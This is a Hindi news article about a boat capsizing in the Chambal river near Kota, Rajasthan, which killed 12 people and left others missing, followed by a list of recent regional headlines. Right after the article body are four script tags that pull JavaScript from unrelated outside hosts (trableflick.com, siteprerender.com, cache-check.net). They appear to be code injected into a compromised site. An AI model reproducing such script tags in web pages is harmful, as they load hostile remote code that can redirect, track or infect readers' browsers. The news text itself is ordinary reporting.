Categories: इंडिया

राजस्थानः चंबल नदी में पलटी नाव, 12 की मौत

<p>राजस्थान के कोटा की चंबल नदी में बड़ा हादसा सामने आया है। जिले के खातोली एरिया में गोठड़ा कला गांव के नजदीक चंबल नदी में अचानक नाव पलट गई। बताया जा रहा है कि इस नाव में करीब 45 लोग सवार थे। नाव पलटने से इसमें सवार लोग डूबने लगे, हालांकि इनमें से कुछ तो किनारे आ गए, जबकि कुछ तैरना ना जानने की वजह से डूब गए। जानकारी के अनुसार, इनमें से 12 लोगों की डूबने से मौत हो गई, जबकि कई लोग लापता बताए जा रहे हैं। घटना सुबह 8:00 बजे की बताई जा रही है।</p>

<p>नाव में कुछ सामान और 14 बाइक भी बांधी हुईं थी। यह लोग नाव के जरिए कमलेश्वर धाम बूंदी एरिया में जा रहे थे। अचानक से जब नाव पलट गई। घटना के बाद आसपास के ग्रामीण पहुंचे और उन्होंने डूब रहे लोगों को बचाना शुरू किया, अभी एसडीआरएफ भी नदी के दोनों जगह ही मौजूद है। नदी की गहराई 40 से 50 फीट बताई जा रही है। जिसके लिए ऑक्सीजन सिलेंडर की मदद से भी रेस्क्यू ऑपरेशन चलाया जा रहा है।</p>

<p><img src=”/media/gallery/images/image(6959).jpeg” style=”height:445px; width:612px” /></p>

<p>मुख्यमंत्री अशोक गहलोत ने मृतकों के परिजनों को एक लाख रुपए आर्थिक सहायता देने की घोषणा की है। हादसे के बाद पुलिस मौके पर पहुंच गई थी और पुलिस ने 14 लोगों की ऐसी सूची बना ली है जो चंबल नदी में लापत हैं। पुलिस के अनुसार डूबने वाले लोगों में अधिकांश बुजुर्ग, बच्चे और महिलाएं शामिल हैं, जो कि तैरना नहीं जानती थी और गहरे पानी के चलते नदी में ही बह गई है। इस संबंध में लोकसभा स्पीकर ओम बिरला ने भी चिंता जताई है। लोकसभा सचिवालय ने जिला प्रशासन से इस संबंध में संपर्क साधा और कोटा से एसडीआरएफ टीम को मौके के लिए रवाना करवाया। रेस्क्यू ऑपरेशन जारी है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1600256334903″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

रेणुका विधानसभा क्षेत्र को उप मुख्यमंत्री का तोहफा, 2.40 करोड़ के विकास कार्यों का शुभारंभ

नाहन। उप मुख्यमंत्री मुकेश अग्निहोत्री ने आज जिला सिरमौर के श्री रेणुका जी विधान सभा…

3 hours ago

जानें कौन सी योजना देगी 1% ब्याज पर 20 लाख का शिक्षा ऋण

  Shimla: डॉ. वाईएस परमार ऋण योजना को सुक्‍खू सरकार ने विस्‍तार दिया है। योजना…

3 hours ago

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

4 hours ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

5 hours ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

5 hours ago

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

6 hours ago